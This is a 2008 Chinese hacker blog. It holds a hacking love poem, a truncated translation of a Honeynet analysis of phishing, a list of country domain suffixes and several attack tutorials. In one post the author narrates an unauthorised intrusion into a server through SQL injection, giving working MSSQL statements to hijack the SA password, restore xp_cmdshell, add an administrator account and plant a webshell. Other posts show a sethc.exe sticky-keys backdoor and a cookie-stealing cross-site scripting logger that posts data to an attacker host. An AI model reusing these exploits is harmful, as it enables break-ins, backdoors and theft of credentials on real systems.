Хакеры's BLOG

搬家！！！！！！

Хакеры — Sat, 19 Jan 2008 23:31:47 GMT+8

新BLOG

http://www.xapbi.cn

不用免费的了，郁闷~

Hack技术学的再好,有什么意义?

Хакеры — Sat, 19 Jan 2008 06:49:31 GMT+8

Hack技术学的再好, 却无法入侵你的心,

服务器入侵的再多,对你只有Guest,

是我的DDos造成了你的拒绝服务?

还是我的ByShell再次被你查杀?

你总有防火墙,我始终停不掉,想提权,

无奈!!!

JSP+MYSQL成为我们的障碍,

找不到你的注入点,扫不到你的空口令.

所有对我的回应都用3DES加密,

你总是自定文件格式,

我永远找不到你的入口点,

忽略所有异常,

却还是跟踪不到你的注册码,

虽然我们是不同的对象,都有隐私的一面,

但我相信总有一天我会找到你的接口,把我的最真给你看!

因为我是你的指针,在茫茫内存的堆栈中,永远指向你那片天空,不孜不倦!

我愿做你的内联,供你无限次的调用,直到海枯石烂!

我愿做你的引用,和你同进退共生死,一起经受考验!

只是我不愿苦苦地调试你的心情,最终沦为你的友元!

如今我们已被MFC封装--事事变迁!

如今我们已向COM走去--可想当年!

Hack技术学的再好, 却无法入侵你的心,

如果你像神话一样那么我就是传说中里面的那个神.

探秘华军软件园

Хакеры — Wed, 16 Jan 2008 07:01:56 GMT+8

无聊，检测下中国平安

Хакеры — Wed, 16 Jan 2008 06:49:10 GMT+8

sa权限下无xp_cmdshell下取权限又一简单方法

Хакеры — Sun, 13 Jan 2008 14:15:13 GMT+8

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
（很多服务器都把'wscript.shell'给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。
上网找了些资料，得到下面方法：
复制文件：

declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';

成功后3389登陆按五次shift键。成功进入服务器。一直向上点"我的电脑"右键"管理" 用户管理直接加用户。
此法随无技术可言，希望对某些人有点用。

华夏vip高级脚本入侵班

Хакеры — Sun, 13 Jan 2008 02:12:43 GMT+8

－－－－－－－－－－－－－－－－－以下为PHP相关－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/PHP配置.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/PHP注射part1.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/PHP注射part2.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/PHP注射part3.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/PHP注射part4.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/tool.rar

－－－－－－－－－－－－－－－－－以下为ACCESS相关－－－－－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ACCESS注射part1.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ACCESS注射part2.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ACCESS注射part3.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ACCESS注射概述.rar

－－－－－－－－－－－－－－－－－－以下为ASP相关－－－－－－－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ASP脚本安全4.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ASP脚本安全5.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ASP脚本安全6.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/ASP脚本安全7.rar

－－－－－－－－－－－－－－－以下为脚本入侵的基础知识讲解－－－－－－－－－－－－－－－－－－
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/脚本基础1.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/脚本基础2.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/脚本基础3.rar
ftp://down1.cmbfree.com/动画教程/翻录教程/华厦黑客培训高级脚本入侵班/脚本基础4.rar

实例解析网路钓鱼攻击

Хакеры — Fri, 11 Jan 2008 10:15:48 GMT+8

网路钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件，意图引诱收信人给出敏感资讯（如用户名、口令、帐号ID、ATM PIN码或信用卡详细资讯）的一种攻击方式。最典型的网路钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上，并获取收信人在此网站上输入的个人敏感资讯，通常这个攻击过程不会让受害者警觉。这些个人资讯对骇客们具有非常大的吸引力，因为这些资讯使得他们可以假冒受害者进行欺诈性金融交易，从而获得经济利益。受害者经常遭受显著的经济损失或全部个人资讯被窃取并用于犯罪的目的。这篇“了解你的敌人”文章旨在基于德国蜜网项目组和英国蜜网专案组所搜集到的攻击资料给出网路钓鱼攻击的一些实际案例分析。这篇文章关注由蜜网专案组在实际环境中发现的真实存在的网路钓鱼攻击案例，但不会覆狸狾野i能存在的网路钓鱼攻击方法和技术。攻击者也在不断地进行技术创新和发展，目前也应该有新的网路钓鱼技术已经在开发中，甚至使用中。

在给出一个简要的引言和背景介绍后，我们将回顾钓鱼者实际使用的技术和工具，给出使用蜜网技术捕获真实世界中的网路钓鱼攻击的三个实验型研究的案例。这些攻击案例将详细地进行描述，包括系统入侵、钓鱼网站架设、消息传播和资料收集等阶段。随后，将对其中普遍应用的技术及网路钓鱼、垃圾邮件和僵尸网路等技术进行融合的趋势给出分析。钓鱼者使用恶意软体进行自动化的Email位址收集和垃圾邮件发送的案例也将被回顾，同时我们也将展示我们在网路扫描技术及被攻陷主机如何被用于传播钓鱼邮件和其他垃圾邮件上的发现。最后，我们对本文给出结论，包括我们在最近6个月内获得的经验，以及我们建议的进一步研究的客体。

这篇文章包括了丰富的支援性资讯，提供了包含特定的网路钓鱼攻击案例更详细资料的链结。最后声明一下，在研究过程中，我们没有收集任何机密性的个人资料。在一些案例中，我们与被涉及网路钓鱼攻击的组织进行了直接联系，或者将这些攻击相关的资料转交给当地的应急回应组织。

引言

欺骗别人给出口令或其他敏感资讯的方法在骇客界已经有一个悠久的历史。传统上，这种行为一般以社交工程的方式进行。在二十世纪九十年代，随着互联网所连接的主机系统和用户量的飞速增长，攻击者开始将这个过程自动化，从而攻击数量巨大的互联网用户群体。最早系统性地对这种攻击行为进行的研究工作在1998年由Gordon和Chess发表。（Sarah Gordon, David M. Chess: Where There's Smoke, There's Mirrors: The Truth about Trojan Horses on the Internet , presented at the Virus Bulletin Conference in Munich, Germany, October 1998）Gordon和Chess研究针对AOL（美国线上）的恶意软体，但实际上他们面对的是网路钓鱼的企图而不是他们所期望的特洛伊木马攻击。网路钓鱼(Phishing)这个词(password harvesting fishing)描述了通过欺骗手段获取敏感个人资讯如口令、信用卡详细资讯等的攻击方式，而欺骗手段一般是假冒成确实需要这些资讯的可信方。 Gordon和Chess描述的一个钓鱼信件如下所示：

Sector 4G 9E of our data base has lost all I/O functions. When your account logged onto our system, we were temporarily able to verify it as a registered user. Approximately 94 seconds ago, your verification was made void by loss of data in the Sector 4G 9E. Now, due to AOL verification protocol, it is mandatory for us to re-verify you. Please click 'Respond' and re-state your password. Failure to comply will result in immediate account deletion.

早期的网路钓鱼攻击主要目的是获得受害者的AOL帐号的访问权，偶尔也期望获取信用卡资料以用于欺诈目的(如非法买卖这些资讯)。这些钓鱼的信件通常包含一个简单的诡计从而哄骗一些“菜鸟”用户，这些欺骗手段很大程度依赖于受害者对“自动化的”系统弁邬恓v威机构的（表面）轮廓的先天性信任，前面的例子中给出一个硬体设备故障或资料库毁坏的情节，大部分的普通用户将会重视任何看起来正式的、或看起来向是为他们提供帮助的紧急的技术上的要求，用户通常会被催促尽快输入其敏感资讯从而避免严重后果，如“ …重新输入你的口令，如未及时输入则将导致直接删除帐号”。为了避免可能潜在的严重的后果，受害者通常立即照做，从而不知不觉地将这些使用此社交工程手段的骇客所需要的敏感资料提供给了他们。事后的证据表明这些骇客都是单独行动，或是以一个小而简单的组织形式活动。一些文献也描述了早期的网路钓鱼者大多是一些期望获得更多帐号资料去恶作剧及打长途电话的青少年，通常没有很强的组织性和蓄意性。

现在，钓鱼者所首选的策略是通过大量散发诱骗邮件，冒充成一个可信的组织机构（通常是那些钓鱼者所期望的已经被受害者所信任的机构），去引诱尽可能多的终端用户。钓鱼者会发出一个让用户采取紧急动作的请求，而具有讽刺意义的是通常其理由是保护用户的机密性资料免受恶意活动的侵害，这封欺骗性的电子邮件将会包含一个容易混淆的链结，指向一个假冒目的机构公开网站的远端网页。钓鱼者希望受害者能够被欺骗，从而向这个假的、但看起来是目的机构的“官方”网站的网页介面输入他们的机密资讯。被钓鱼者所青睐的目的机构包括很多著名的银行，信用卡公司和涉及日常性支付行为的知名互联网商务网站（如eBay和Paypal等）。大量针对互联网用户的钓鱼邮件的实例可以在反网路钓鱼工作组（Anti-Phishing Working Group）的网站上的钓鱼邮件归档中可以获得，其中钗h邮件都显示了钓鱼者可以欺骗无知的用户相信他们正在访问一个合法的网页介面的极高精确性。

在这个简要介绍网路钓鱼概念的引言之后，我们将开始回顾在我们观察到的真实网路钓鱼攻击中所实际使用的技术和工具。如果你对网路钓鱼的更深入的背景知识感兴趣，我们为你准备了具体的背景资讯这个页面。

工具和策略

网路钓鱼攻击一般仅利用一些简单的工具和技术来欺骗无戒备心的用户。支撑一次网路钓鱼攻击的底层基础设施可以是最基本的简单地拷贝一个HTML页面，上传到一个刚刚攻陷的网站伺服器，以及一个伺服器端的用来处理用户输入资料的脚本，也可能涉及更为复杂的网站及内容重定向，但他们的底层目标是一致的——架设一个假冒可信机构的网站，并部署一些必需的后台脚本处理用户的输入资料并让攻击者获取。使用最新的HTML编辑工具可以非常容易地构建出模仿目标组织机构的网站，同时如果攻击者不介意扫描互联网IP位址空间以寻找潜在的有漏洞的主机，缺乏有效的安全防护的网站伺服器也能够非常容易地找到并被攻陷。一旦被攻陷，即使是家庭用的PC主机都可以作为钓鱼网站的宿主主机，所以钓鱼者的攻击目标不仅仅是知名的企业和学院里的系统。攻击者经常不分青红皂白地去选择他们的目标主机，而仅仅是在一个大的IP位址空间中随机地扫描，寻找可被利用的特定的安全漏洞。

一旦钓鱼者建立起一个模仿可信机构的真实且能够让人信以为真的假冒网站后，对他们的重要挑战是如何将用户从一个合法的网站转移到访问他们所架设的假冒网站。除非钓鱼者有能力去改变目标网站的DNS解析（称为DNS中毒攻击）或采取其他方式对网路流量进行重定向（称为pharming的一种技术），他们必须依赖某种形式的内容上的欺骗技巧，去引诱不幸的用户去访问假冒的网站。欺骗技巧的品质越高，他们所撒的渔网就越宽，一个无知的用户错误地访问这个假冒网站（并提供给钓鱼者他的机密资讯和私人资料）的机会就越大。

对攻击者不幸的是，当他们假冒一个组织结构（如一个银行或可信的商务网站），钓鱼者通常没有任何互联网上哪些用户属于他们的客户此类资讯，也就不知道哪些用户最容易上钩。即使钓鱼者可以将指向假冒网站的链结发布到与目的机构相关的一些聊天室或论坛上（如一个技术支援网站或网路社区谈论组），目的机构很可能比较迅速地被通知并做出反应，这个链结也会在很多受害者访问它所指向的内容并提交他们的个人资讯前被清除。同时对钓鱼者也存在一个显著的风险，目的机构或法律执行部门可能会追踪并关闭这些假冒的网站。因此，钓鱼者需要一个方法，能够在尽量减少他们所承担的风险的同时，在短时间内欺骗尽可能多的潜在受害群体，他们找到了理想的犯罪搭档——垃圾邮件。

垃圾邮件发送者拥有包括几百万使用中电子邮件位址的资料库，因此最新的垃圾邮件群发技术可以用来帮助一个钓鱼者低风险广泛地发布他们的诱骗邮件。垃圾邮件通常通过一些被攻陷的架设在境外主机上的邮件伺服器，或是通过一个全球的傀儡主机网路(botnets)进行发送，因此邮件发送者被追踪的可能性将会很小。如果一个无戒备心的用户收到一封看起来像是由他们的银行所发来的，带有银行正式标志的电子邮件，要求他们访问一个看起来与银行官方网站一摸一样的网站并由于安全理由更改他们线上的银行口令，这比起那些介绍新奇产品并链结到未知网站的普通垃圾邮件来更可能使得用户上当。为了增加用户相信这个邮件是真实的可能性，钓鱼者会应用一些另外的技术来进一步提高他们所进行的诱捕手段的品质：

在指向假冒网站的链结中使用IP位址代替弁鉣偻W称。一些无戒备心的用户将不会检查（或不知道如何检查）这个IP位址是否来自假冒网站页面上所声称的目的机构。

注册发音相近或形似的DNS弁鉣偻W称（如b1gbank.com或bigbnk.com假冒bigbank.com ），并在上面架设假冒网站，期望用户不会发现他们之间的差异。

在一个假冒钓鱼网站的电子邮件HTML内容中嵌入一些指向真实的目标网站的链结，从而使得用户的网站流览器的大多数HTTP连接是指向真实的目标网站，而仅有少数的关键连接（如提交敏感资讯的页面）指向假冒的网站。如果用户的电子邮件用户端软体支援HTML内容的自动获取，那会在电子邮件被读取的时候自动地连接假冒网站，手动地流览也不会在大量与真实网站的正常网路活动中注意到少量与恶意伺服器的连接。

对假冒网站的URL进行编码和混淆，很多用户不会注意到或者理解URL链结被做过什么处理，并会假设它是良性的。 IDN欺骗技术（IDN spoofing）就是这样的一种技术，它使用Unicode编码的URL在流览器的位址栏里呈现的看起来像是真实的网站位址，但实际上却指向一个完全不同的位址。

企图攻击用户网页流览器存在的漏洞，使之隐藏消息内容的实质。微软的IE和Outlook都被发现过存在可以被这种技术攻击的漏洞（如位址栏假冒和IFrame element漏洞）。

将假冒的钓鱼网站配置成记录用户提交的所有资料并进行不可察觉的日志，然后将用户重定向到真实的网站。这将导致一个“口令错误，请重试”错误，或什至完全透明，但在每种情况下，大部分用户都不会发觉，更相信是自己的错误输入，而不会想到是由于恶意第三方的干涉。

....................未完待续........................... ........................

挑战BT-Sa

Хакеры — Thu, 10 Jan 2008 12:29:39 GMT+8

由于工作原因，疏于管理肉鸡，用了许久的VPN肉鸡飞了......米办法，因为上一些国外站点需要用VPN，只能再去找几台做VPN用用了。于是找GOOGLE帮忙，搜了下。不一会就找到了个有注入且为SA权限的肉鸡，心想，今天运气不错嘛。一找就给我了个SA。可能有些朋友看到这边，或许该起哄了，都SA了，这还好意思写文章出来，这类文章多的跟米一样，不差我这篇吧。呵呵，如果是一般的情况，我也不会厚脸皮写出来了。请耐心继续往下看,从中你可以学到xp_makecab，xp_unpackcab, xp_regread, sp_configure等扩展存储的使用。
OK，我先说下这台BT肉鸡的大概情况。
2K+MSSQL2000+IIS
对外开放80，1433，3389端口,且此服务器上只放该站一个站点，而且后台密码是写在ASP文件里的（前面猜表时并未找到后台相关的表，于是猜测对方是把密码写在ASP文件里了，进去后肯定了我的猜测）。
网络上公认的危险存储扩展均被删除,且无法恢复。
(后来确认是 odsole70.dll，xplog70.dll,xpstar.dll三个DLL被删除)
这三个DLL的删除，意味着N多的存储扩展用不了了。也就意味着，虽然是SA权限，但你却不能执行命令，不能列目录，不能读改注册表，不能恢复被删除的存储扩展。
OK，大体情况已经说了，难度系数是有D，看我是如何击破这坚固的堡垒的。
虽然对方开放了1433端口，但是这并不代表着WEB和数据库就肯定是在一快的。曾经就碰过这类的机器，虽然开着MSSQL服务，但是却是给别的WEB机器提供的。节省资源，又相对安全。于是我先在本地用NC监听80端口(反连看IP，自己机器并不一定要有装MSSQL的)，在注射点上注射如下语句：
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=111.111.111.111,80;', 'select * from dest_table') select * from src_table;--
因为我们只要看IP，所以其他的参数就无所谓了。而端口设置成80，是为了预防一些机器只让访问外部80。
没一会，就有机器连过来了，一看IP。嘿嘿，正是目标机器。如图1

于是大胆进行下一步计划--获取WEBSHELL。
要获取WEBSHELL，首先我们得需要路径，如何去获取路径呢？由于许多存储扩展已经不能使用，我们没办法执行命令，列目录，查看注册表等操作。于是，我脑袋里闪过的IDEA就是，读取MetaBase.bin文件！有经验的朋友都知道，此文件乃IIS 5.0的网站配置文档。可怎么读呢？
drop table [nspcn]
CREATE TABLE [nspcn](ResultTxt nvarchar(1024) NULL)
BULK INSERT [nspcn] FROM 'c:\boot.ini' WITH (KEEPNULLS)
insert into [nspcn] values ('g_over');Alter Table [nspcn] add id int NOT NULL IDENTITY (1,1)
select * from [nspcn]
上面的代码利用BULK来读取boot.ini文件，本地测试成功读取。
下图是本地测试的抓图如图2

于是转而读取MetaBase.bin文件，但是当时测试的时候失败了。读取的内容为空。
下图是本地测试的抓图(由于虚拟机只有2K3有装MSSQL，我从2K上COPY了个MetaBase.bin) 如图3

于是我又想到了xp_makecab，xp_unpackcab两个扩展存储，于是用了如下语句：
;exec master..xp_makecab ''C:\WINNT\Help\iisHelp\common\404b.cab ','mszip',1,''C:\WINNT\Help\iisHelp\common\404b.htm'
--//备份404b.htm页面
--//由于当时忘了xp_unpackcab有个参数可以解压重命名的，哎，真是大意啊。于是用了下面的烂招
Exec master..xp_makecab ' C:\WINNT\Help\iisHelp\common\404b.htm ','mszip',1,'C:\WINNT\system32\inetsrv\MetaBase.bin'
--//结果肯定失败了！
没办法，只能另图他法了。得想办法恢复那些存储扩展才行。先用NC连了下对方的1433，根据反馈结果表示可以连上。如图4

于是用如下语句加了个SYSADMIN权限的用户
;exec master.dbo.sp_addlogin nspcn,netpatch--
;exec master.dbo.sp_addsrvrolemember nspcn sysadmin--
--//后来才发现我语句写错了,第二句漏了个逗号!
--//正确的应该是exec master.dbo.sp_addsrvrolemember nspcn, sysadmin--

用查询分析器连接上去，发现只是个PUBLIC权限，晕死我了。当时也晕忽忽的，不知道哪里错了。用NBSI也没加上。
于是想到了一个疯狂的点子，修改SA密码。如何修改呢？如果我们直接用;exec master.dbo.sp_password null,nspcn,netpatch-修改，虽然有办法修改，但万一恢复不了扩展，我们又不知道原密码，没办法将密码修改回去。那么我们将完全暴露，得想个巧妙的方法才行。
于是想到了，先复制SA的HASH到A用户，然后再把B用户的HASH复制给SA，当然我们知道这个B用户的密码。这样我们就可以用知道的密码连上去了,修改回去时也把A用户的HASH复制给SA就可以了。
我们先设想下修改后的情况，如果密码修改成功，那么网站立即崩溃爆错。如果不在最短的时间内恢复，那么我的行动将会暴露。结合上面的"万一恢复不了扩展"我制定了如下计划，准备好恢复sp_addextendedproc存储扩展的SQL语句，以及此扩展恢复后需要恢复存储扩展以及要执行的命令，当然最后一条是把SA密码修改回去。相关SQL如下：
Use master
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),
@dllname varchar(255)
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
--以上是恢复sp_addextendedproc
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll'
EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll'
EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll'
EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll'
--以上语句是恢复各存储扩展
exec master.dbo.xp_cmdshell 'net user nspcn netpatch /add&&net localgroup administrators nspcn /add'--
;DECLARE @shell INT EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user nspcn netpatch /add&&net localgroup administrators nspcn /add ','0','true'
exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user nspcn netpatch /add&&net localgroup administrators nspcn /add ")')
--为了预防万一，用了多个存储扩展执行添加nspcn用户的命令
update sysxlogins set password=(select top 1 password from sysxlogins where name='a') where name='sa'
--重要语句，把SA密码修改回去

但是，在默认情况下master.dbo.sysxlogins是不允许修改的。我们需要开启这个权限。
执行exec master.dbo.sp_configure 'allow updates', 1;RECONFIGURE WITH OVERRIDE--后，我们成功开启了修改权限。于是建立了2个用户，密码均为netpatch
先用update sysxlogins set password=(select top 1 password from sysxlogins where name='sa') where name='a'
把SA的HASH复制过去。
然后再用update sysxlogins set password=(select top 1 password from sysxlogins where name='b') where name='sa'
把密码修改为netpatch
修改后立即用查询分析器执行已经准备好的命令，但当命令执行完毕时，发现一个很严重的问题，就是odsole70.dll，xplog70.dll,xpstar.dll三个DLL已被删除，无法恢复我们需要的存储扩展了。如图5、如图6

再次陷入困境。在百般无耐的情况下，只能用一个没办法的点子--猜WEB目录路径。
用读文件的方法，尝试读取网站的主页。后面还是RP好，猜了4次后被我猜到了WEB目录。D:\网站名\index.asp
当文件内容被读取出来时，那个兴奋啊，于是立即用差异备份，备份了一个WEBSHELL。如图7

从WEBSHELL中找到了数据库连接文件，获得了SA的密码。
然后再从WEBSHELL上传了一个自己的存储扩展，用海阳ASP木马的的数据库管理功能，连接数据库后，用如下语句添加了一个自己的存储扩展！
use master
exec sp_addextendedproc 'xp_nspcn', 'xp_nspcn.dll'
grant exec
on xp_npsed
to public
再用自己的存储扩展执行如下语句
Exec master.dbo.xp_nspcn 'net user nspcn netpatch /add&&net localgroup administrators nspcn /add'
再用添加的用户成功登陆了3389。如图8

虽然进去了，但这是侥幸进去的，并不是完全靠实力进去的，心中有所不服。心想，要是现在不解决这个问题，以后碰到类似的，那不就更郁闷了。于是再次研究各个存储扩展的语法。研究后才发现了自己前面犯的三个严重错误，导致自己绕了一大圈才进去。
第一。本可以利用xp_makecab、xp_unpackcab配合404页面，获取路径！
下面是相关的SQL语句。

Exec master..xp_makecab 'C:\WINNT\Help\iisHelp\common\404b.cab','mszip',1,' C:\WINNT\Help\iisHelp\common\404b.htm'
--先备份404b.htm页面
Exec master..xp_makecab 'C:\WINNT\Help\iisHelp\common\metabase.cab','mszip',1,'C:\WINNT\system32\inetsrv\MetaBase.bin'
--备份metabase.bin文件到C:\WINNT\Help\iisHelp\common\目录
exec master..xp_unpackcab 'C:\WINNT\Help\iisHelp\common\metabase.cab',' C:\WINNT\Help\iisHelp\common\',1,' 404b.htm'
--将MetaBase.bin从C:\WINNT\Help\iisHelp\common\metabase.cab中解压出来，并重命名为404b.htm
然后我们访问该站不存在的文件名，就可以利用404b文件帮我们列出文件内容了。
第二。就是加SYSADMIN权限的SQL用户时漏了个逗号，导致添加帐号失败！
第三。用了笨办法来修改SA密码！
其实完全可以用exec master.dbo.sp_configure 'allow updates', 1;RECONFIGURE WITH OVERRIDE; update sysxlogins set xstatus=18 where name='nspcn'--来提升SQL用户权限。
虽然饶了个大圈子，但却长了不少经验......值！中间曲折的过程，让自己更加懂得如何应付相关的状况。嘿嘿，不知小弟写了那么多，您是否有什么新的收获呢？

跨站脚本执行漏洞代码的六点思路

Хакеры — Thu, 10 Jan 2008 08:44:55 GMT+8

1．构造一个提交，目标是能够显示用户Cookie信息：

http://www.xxxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

2．如果上面的请求获得预期的效果，那么我们就可以尝试下面的请求：

http://www.xxx.net/txl/login/login.pl?username=&passwd=&ok.x=28&ok.y=6

其中http://www.xxx.org/info.php是你能够控制的某台主机上的一个脚本，功能是获取查询字符串的信息，内容如下：

$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}
header("Location: http://www.xxx.net");

注："%2B"为"+"的URL编码，并且这里只能用"%2B"，因为"+"将被作为空格处理。后面的header语句则纯粹是为了增加隐蔽性。
3．如果上面的URL能够正确运行的话，下一步就是诱使登陆xxx.net的用户访问该URL，而我们就可以获取该用户Cookie中的敏感信息。
4.

5. 就可以自己构造一个下面的头像文件：

thiz.gif

6.新建一个x.gif，内容如下：

今天帮姐姐做空间，发现了个不错的歌曲，呵呵，属于轻音乐！

Хакеры — Thu, 10 Jan 2008 08:22:39 GMT+8

喜欢的一起来听听！

头像一刷新就换

Хакеры — Thu, 10 Jan 2008 01:39:50 GMT+8

新建一个TXT文本,写上

保存
重命名为index.php
找5张gif格式的图片和php文件一起传到空间的一个文件夹里面
头像路径http://域名/文件夹/index.php?.gif

各国域名后缀

Хакеры — Thu, 10 Jan 2008 01:00:40 GMT+8

A
.ac 亚森松岛
.ad 安道尔
.ae 阿拉伯联合酋长国
.af 阿富汗
.ag 安提瓜和巴布达
.ai 安圭拉
.al 阿尔巴尼亚
.am 亚美尼亚
.an 荷属安地列斯群岛
.ao 安哥拉
.aq 南极洲
.ar 阿根廷
.as 美属萨摩亚
.at 奥地利
.au 澳大利亚
.aw 阿鲁巴
.az 阿塞拜疆

B
.ba 波斯尼亚和黑塞哥维那
.bb 巴巴多斯
.bd 孟加拉国
.be 比利时
.bf 布基纳法索
.bg 保加利亚
.bh 巴林
.bi 布隆迪
.bj 贝宁
.bm 百慕大
.bn 文莱
.bo 玻利维亚
.br 巴西
.bs 巴哈马
.bt 不丹
.bv 布维岛
.bw 博茨瓦纳
.by 白俄罗斯
.bz 伯利兹

C
.ca 加拿大
.cc 可可群岛
.cd 刚果民主共和国
.cf 中非共和国
.cg 刚果
.ch 瑞士
.ci 科特迪瓦
.ck 库克群岛
.cl 智利
.cm 喀麦隆
.cn 中国大陆
.co 哥伦比亚
.cr 哥斯达黎加
.cu 古巴
.cv 佛得角
.cx 圣诞岛
.cy 塞浦路斯
.cz 捷克共和国

D
.de 德国
.dj 吉布提
.dk 丹麦
.dm 多米尼克
.do 多米尼加共和国
.dz 阿尔及利亚

E
.ec 厄瓜多尔
.ee 爱沙尼亚
.eg 埃及
.eh 西撒哈拉
.er 厄立特里亚
.es 西班牙
.et 埃塞俄比亚
.eu 欧洲联盟

F
.fi 芬兰
.fj 斐济
.fk 福克兰群岛
.fm 密克罗尼西亚联邦
.fo 法罗群岛
.fr 法国

G
.ga 加蓬
.gd 格林纳达
.ge 格鲁吉亚
.gf 法属圭亚那
.gg 格恩西岛
.gh 加纳
.gi 直布罗陀
.gl 格陵兰
.gm 冈比亚
.gn 几内亚
.gp 瓜德罗普
.gq 赤道几内亚
.gr 希腊
.gs 南乔治亚岛和南桑德韦奇岛
.gt 危地马拉
.gu 关岛
.gw 几内亚比绍
.gy 圭亚那

H
.hk 香港
.hm 赫德和麦克唐纳群岛
.hn 洪都拉斯
.hr 克罗地亚
.ht 海地
.hu 匈牙利

I
.id 印度尼西亚
.ie 爱尔兰
.il 以色列
.im 马恩岛
.in 印度
.io 英属印度洋地区
.iq 伊拉克
.ir 伊朗
.is 冰岛
.it 意大利

J
.je 泽西岛
.jm 牙买加
.jo 约旦
.jp 日本

K
.ke 肯尼亚
.kg 吉尔吉斯斯坦
.kh 柬埔寨
.ki 基里巴斯
.km 科摩罗
.kn 圣基茨和尼维斯
.kp 朝鲜
.kr 韩国
.kw 科威特
.ky 开曼群岛
.kz 哈萨克斯坦

L
.la 老挝
.lb 黎巴嫩
.lc 圣卢西亚
.li 列支敦士登
.lk 斯里兰卡
.lr 利比里亚
.ls 莱索托
.lt 立陶宛
.lu 卢森堡
.lv 拉脱维亚
.ly 利比亚

M
.ma 摩洛哥
.mc 摩纳哥
.md 摩尔多瓦
.mg 马达加斯加
.mh 马绍尔群岛
.mk 马其顿
.ml 马里
.mm 缅甸
.mn 蒙古
.mo 中国澳门
.mp 北马里亚纳群岛
.mq 马提尼克岛
.mr 毛里塔尼亚
.ms 蒙特塞拉特岛
.mt 马耳他
.mu 毛里求斯
.mv 马尔代夫
.mw 马拉维
.mx 墨西哥
.my 马来西亚
.mz 莫桑比克

N
.na 纳米比亚
.nc 新喀里多尼亚
.ne 尼日尔
.nf 诺福克岛
.ng 尼日利亚
.ni 尼加拉瓜
